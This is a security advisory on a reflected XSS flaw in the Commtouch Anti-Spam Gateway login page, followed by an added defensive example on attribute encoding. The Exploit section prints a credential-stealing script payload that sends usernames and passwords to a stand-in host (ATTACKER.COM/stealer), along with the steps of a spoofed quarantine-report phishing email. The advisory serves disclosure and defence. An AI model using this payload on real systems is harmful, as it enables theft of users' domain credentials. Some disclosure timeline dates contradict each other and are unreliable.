Commtouch Anti-Spam Enterprise Gateway is "an anti spam solution, protecting enterprise networks for the ever increasing spam emails. The anti spam solution includes a web application console which enables the enterprise users to check the blocked messages, release messages, apply blocking rules and more".
A reflected XSS vulnerability was discovered in the Commtouch product login page which enables an attacker to steal a victim's credentials to the corporate network. Since the login credentials are usually the victim's credentials to the domain, it is a high risk vulnerability which puts the whole domain's passwords at risk.
Credit:
The information has been provided by Erez Metula.
Apart from being used as a regular reflected XSS attack vector, for example by sending a malicious link to the user, there is another attack vector that can be used which derives from the specific way the product works.
The product sends a periodic email report to the user, listing the emails that were identified as spam and were blocked. The user is given an option to release / approve the mail, by clicking on the corresponding link.
Clicking on the link brings the login page, in which the user enters his domain credentials in order to access the web application and commit the action.
If an attacker sends a fake link pretending to come from the product and containing the XSS link inside it, the user can easily be enticed to supply his credentials in order to access the product console.
Exploit:
As explained above, exploitation can be achieved by traditional XSS methods by utilizing the following pattern:
http://SERVER/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&LoginType=1&PARAMS=XXX"> <SCRIPT>PAYLOAD </SCRIPT><input%20type="hidden"%20name="XXX"%20value="X
More interesting is a specific exploitation tied to the product behavior, in which an attacker will fake the "My Quarantine Report" coming from the product.
Steps:
1) Setting up a credential stealing page at http://ATTACKER.COM/stealer
2) Building a fake "My Quarantine Report" email with some enticing "release me" email
3) Replacing the content of the contained links inside the mail to
http://SERVER/AntiSpamGateway/UPM/English/login/login.asp?LoginName=XXX&LoginType=1&DIRECTTO=3&PARAMS=XXX"> <script>function SendCredentials(){ img = new Image(); img.src="http://ATTACKER.COM/stealer/?userid=" + document.forms[0].LoginName.value + "&password=" + document.forms[0].LoginPass.value;} function HandleSubmit(){ document.forms[0].onsubmit= SendCredentials; } window.onload = HandleSubmit;</script><input%20type="hidden"%20name="Params2"%20value="x
4) Sending the fake email, pretending to be from the Commtouch service
Impact:
Since the login credentials are usually the victim's credentials to the domain, it is a high risk vulnerability which puts the whole domain passwords at risk.
Workaround:
Although originally reported for version V4 in 2006, the problem was not solved even in version V5. There is no official solution yet. The only workaround possible is to blacklist HTML / SCRIPT tags, which can be bypassed relatively easily and is not considered a very good solution.
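The exploit pattern above works because the login page reflects the PARAMS value into a hidden input's value attribute without encoding, so a double quote closes the attribute and the rest of the parameter becomes markup. The following is an added example (not Commtouch's code; the exact markup of login.asp is an assumption based on the advisory's payload) that contrasts that unencoded reflection with proper HTML attribute encoding, and shows why the tag blacklist the advisory mentions is a weak workaround: even with the script tags stripped, the quote still breaks out of the attribute, while attribute encoding keeps the whole value inside it.

```javascript
// Added example, not product code. The hidden-input template shape is
// assumed from the advisory's payload, which closes a value="..." attribute.

// Pattern quoted in the advisory (placeholders XXX / PAYLOAD kept as-is).
const ADVISORY_PATTERN =
  'XXX"> <SCRIPT>PAYLOAD </SCRIPT><input type="hidden" name="XXX" value="X';

// Encode every character that can change meaning inside a quoted attribute.
function escapeHtmlAttribute(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Vulnerable rendering: the request parameter is inserted verbatim,
// which is the behaviour the advisory describes for login.asp.
function renderHiddenInputVulnerable(name, value) {
  return '<input type="hidden" name="' + name + '" value="' + value + '">';
}

// Hardened rendering: dynamic attribute values are always encoded.
function renderHiddenInputSafe(name, value) {
  return '<input type="hidden" name="' + escapeHtmlAttribute(name) +
         '" value="' + escapeHtmlAttribute(value) + '">';
}

// The weak workaround from the advisory: strip <script> tags and nothing else.
function blacklistScriptTags(value) {
  return String(value).replace(/<\/?script[^>]*>/gi, '');
}

// True when the rendered element is a single hidden input whose name and
// value stayed inside their quotes (no raw quote or angle bracket escaped).
function isWellFormedHiddenInput(html) {
  return /^<input type="hidden" name="[^"<>]*" value="[^"<>]*">$/.test(html);
}

// True when a browser would see a real <script> start tag in the output.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Summary of the three handling strategies against the advisory's pattern.
function compareHandling(value) {
  const vulnerable = renderHiddenInputVulnerable('Params2', value);
  const blacklisted = renderHiddenInputVulnerable('Params2', blacklistScriptTags(value));
  const safe = renderHiddenInputSafe('Params2', value);
  return {
    vulnerableIntact: isWellFormedHiddenInput(vulnerable),   // false: attribute broken out of
    vulnerableScript: containsScriptTag(vulnerable),         // true: script tag reaches the browser
    blacklistIntact: isWellFormedHiddenInput(blacklisted),   // false: quote still closes the attribute
    blacklistScript: containsScriptTag(blacklisted),         // false, but markup is still injectable
    safeIntact: isWellFormedHiddenInput(safe),               // true: value stays inside the attribute
    safeScript: containsScriptTag(safe),                     // false: tag is encoded as text
  };
}

console.log(compareHandling(ADVISORY_PATTERN));
```

The blacklist result is the point to note for a defender: stripping the tag names removes one payload but leaves the attribute boundary broken, so any later markup in the parameter is still interpreted by the browser. Contextual output encoding of every reflected value is the fix; tag filtering is only a stopgap.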
Vendor response:
Commtouch was informed on 7/12/06 by e-mail to their support. Commtouch had not fixed the problem by the time of publication.
Disclosure Timeline:
26/12/06 - Identification of the flaw
27/12/06 - Reporting the flaw to Commtouch by email
28/06/06 - Response from Commtouch, asking for more description
03/01/07 - Providing the full description to Commtouch
22/01/07 - Commtouch acknowledged the vulnerability
22/01/07 - Commtouch responded that the delivery time for a patch was unknown
27/01/07 - Commtouch was notified about full disclosure of this information to the public
26/06/08 - Release of this information, after neither a patch nor a fix appeared in the version V5 release